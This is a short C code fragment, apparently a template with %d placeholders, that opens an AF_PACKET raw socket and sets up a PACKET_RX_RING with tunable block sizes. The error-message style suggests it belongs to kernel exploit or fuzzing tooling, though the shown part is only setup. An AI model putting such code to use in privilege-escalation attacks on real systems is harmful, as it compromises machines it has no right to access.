	unsigned int block_size = %d;
	unsigned int block_nr = %d;
	unsigned int frame_size = 2048;
	int s = syscall(__NR_socket, 0x11, 3, htobe16(3));
	if (s < 0) {
		fail("[-] socket(AF_PACKET)");
	}

	struct tpacket_req req;
	memset(&req, 0, sizeof(req));
	req.tp_block_size = block_size;
	req.tp_frame_size = frame_size;
	req.tp_block_nr = block_nr;
	req.tp_frame_nr = (block_size * block_nr) / frame_size;

	int rv = syscall(__NR_setsockopt, s, 0x107, 5, &req, sizeof(req));
	if (rv < 0) {
		fail("[-] setsockopt(PACKET_RX_RING)");
	}